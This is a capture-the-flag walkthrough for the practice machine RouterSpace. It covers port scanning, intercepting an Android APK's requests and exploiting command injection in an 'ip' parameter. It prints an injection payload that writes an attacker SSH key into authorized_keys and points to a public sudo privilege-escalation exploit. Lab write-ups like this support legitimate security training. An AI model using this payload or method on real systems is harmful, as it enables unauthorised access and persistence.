Nmap scan report for 10.10.11.148
Host is up (0.15s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_ 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-90752
| Content-Type: text/html; charset=utf-8
| Content-Length: 83
| ETag: W/"53-1CPF2lTAVDqjw0ulBsW5R961pkE"
| Date: Wed, 06 Jul 2022 19:33:03 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: gDdeM 7Oi rA q Q dB 1qhNmgI }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-15939
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Wed, 06 Jul 2022 19:33:01 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-33000
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Wed, 06 Jul 2022 19:33:02 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
|_http-title: RouterSpace
We have two open ports, SSH on 22 and HTTP on 80, and their versions have no serious vulnerabilities. Nothing to do with SSH for now, so let's enumerate port 80.
![[Pasted image 20220708232149.png]] Going to http://10.10.11.148/ we see a static HTML page, but there is a download button that downloads an APK file. ![[Pasted image 20220708232113.png]]
Now we need to know what this app is doing, so let's install it on an Android emulator and configure Burp Suite to listen on all interfaces so it can intercept the emulator's traffic. Any Android emulator will do; I will use Genymotion for this one.
First, configure Burp to listen on all interfaces on port 8081. ![[Pasted image 20220708232808.png]]
Next, set the proxy on the emulator under Settings -> Wi-Fi -> Modify Network -> Proxy. ![[Pasted image 20220708233000.png]]
The last step is to drag and drop the APK file onto the emulator to install it. The application has only a "Check Status" button; when we click it and look at the HTTP history tab in Burp Suite we see a POST request to http://routerspace.htb with no response (our machine doesn't know how to resolve routerspace.htb). ![[Pasted image 20220708233809.png]]
So let's add this hostname to the hosts file. Now we see a response. ![[Pasted image 20220708234414.png]] ![[Pasted image 20220708233534.png]]
Let's send this request to Repeater to play with. The first thing that came to my mind was that maybe the machine executes a system command on the ip parameter, like ping -c1 <ip>, to check whether the specified IP is up or not, so I tried injecting whoami in the ip parameter. ![[Pasted image 20220708234702.png]] And it works: I am paul.
I tried to get a reverse shell in various ways but failed, so I just put my SSH public key in the authorized_keys file and SSHed into the machine as user paul.
Payload:
;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVd5Cr7JucC1oFvizD2p9lBPCGuWR7H7COIYtZnrwLJomv1jvt5P26ayTOrB44HkaPsFJlBX0r+IsUdfbg0C0THEWXK2YYuik5drXUapmyhoh+o/2+u/KPtdq6+XjaUQ712mXXK1pSC7QpHjTcyVjyvr0zjAUW+MZwo0uUsLaDa/wsoWoFDoJ0iZqtMw/uz9WtOywKMu425eRs5C2us1AebpAMn7FO3tDLPLgSv4z6XUfYDR7VtBCZNKiX6ob2VfEnKSNhPiMiGzWEnrEZec6Gb4jpcMsxazmHzN5lcRBvILaacRgYyIJom5aWI7F9YX5e+IIBj03f+VbMU4hgbZw7 > ~/.ssh/authorized_keys;
![[Pasted image 20220709010431.png]]
I ran linpeas.sh and quickly found that the sudo version may be vulnerable. ![[Pasted image 20220709021315.png]]
So I searched for public exploits for this version and found this repository.
https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
I cloned this repo but couldn't transfer the files to the machine, so I copied and pasted every file.
Finally, run make and then ./exploit, and we are root on the box!
![[Pasted image 20220709021724.png]]